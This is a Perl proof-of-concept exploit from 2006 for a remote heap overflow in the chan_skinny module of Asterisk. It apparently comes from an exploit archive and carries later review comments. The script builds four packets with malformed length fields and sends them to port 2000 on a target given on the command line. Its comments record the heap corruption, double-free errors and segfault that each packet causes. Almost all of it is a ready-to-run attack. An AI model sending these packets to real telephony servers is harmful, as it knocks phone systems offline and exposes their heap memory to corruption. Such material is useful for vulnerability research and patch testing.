
# Title : Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC)
# Published : 2006-10-19
# Author : Noam Rathaus


#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept makes chan_skinny crash in several different locations; the
# crashes show heap memory corruption as well as double-free calls. It is based on the findings
# of Security-Assessment.com and demonstrates that the vulnerability is indeed present and
# exploitable (the glibc/gdb output observed for each packet is recorded beside it below).
#

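use IO::Socket;
use strict;
use warnings;

# Four test packets, each a single skinny request.  chan_skinny.c:2896 copies
# the request with memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8), i.e. it
# trusts the 4-byte little-endian length word at the start of the client data
# and copies length+8 bytes, so a length larger than what was sent (or one
# that wraps when 8 is added) drives the copy past the heap buffer.
#
# NOTE(review): the original listing had lost the backslashes of its "\x.."
# escapes ("x30xE0x00x00"), which turned the length words into plain ASCII
# text; they are restored here so the first 4 bytes really are binary.
# The original also declared `my $packet` four times, so only the last
# packet (len_neg) was ever sent; that one is still the default below.
my %PAYLOAD_OF = (
    # no header at all: *** glibc detected *** malloc(): memory corruption ***
    garbage => 'A' x 1000,
    # length 0x0000E030 (57392), second header word zero, 1000 byte body:
    # *** glibc detected *** double free or corruption (!prev) ***
    len_big => "\x30\xE0\x00\x00" . "\x00\x00\x00\x00" . ('A' x 1000),
    # length 0x000003E5 (997) + 8 = 1005 copied, but only 1000 bytes sent:
    # *** glibc detected *** double free or corruption (out) ***
    len_997 => "\xE5\x03\x00\x00" . ('A' x 996),
    # length 0xFFFFFFF0: adding 8 wraps, memcpy gets a huge size:
    # SIGSEGV in skinny_session (chan_skinny.c:2896)
    len_neg => "\xF0\xFF\xFF\xFF" . ('A' x 996),
);

# Return the raw bytes for one named test case (a key of %PAYLOAD_OF).
# Dies with the list of known cases when the name is unknown, so a typo on
# the command line does not silently send nothing.
sub build_packet {
    my ($case) = @_;
    die "unknown test case '$case'; known cases: "
        . join(', ', sort keys %PAYLOAD_OF) . "\n"
        unless exists $PAYLOAD_OF{$case};
    return $PAYLOAD_OF{$case};
}

# Connect to the skinny listener (TCP port 2000) on $target and send one
# packet.  Both arguments are optional: target defaults to 127.0.0.1 and the
# case to len_neg, which is what the original script effectively sent.
# Usage: perl poc.pl [target] [garbage|len_big|len_997|len_neg]
sub main {
    my ($target, $case) = @_;
    $target = '127.0.0.1' unless defined $target;
    $case   = 'len_neg'   unless defined $case;

    # Build first so a bad case name fails before we touch the network.
    my $packet = build_packet($case);

    my $remote = IO::Socket::INET->new(
        Proto    => 'tcp',
        PeerAddr => $target,
        PeerPort => 2000,
    );
    # IO::Socket leaves the reason in $@; the original message is kept.
    unless ($remote) { die "cannot connect to skinny daemon on $target: $@" }

    # Raw binary payload: no newline and no layer translation.
    binmode $remote;
    print {$remote} $packet or die "sending $case to $target failed: $!";
    close $remote or warn "close: $!";
    return;
}

# Run only when executed directly, so the packet builders can be loaded
# and tested without opening a connection.
main(@ARGV) unless caller;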
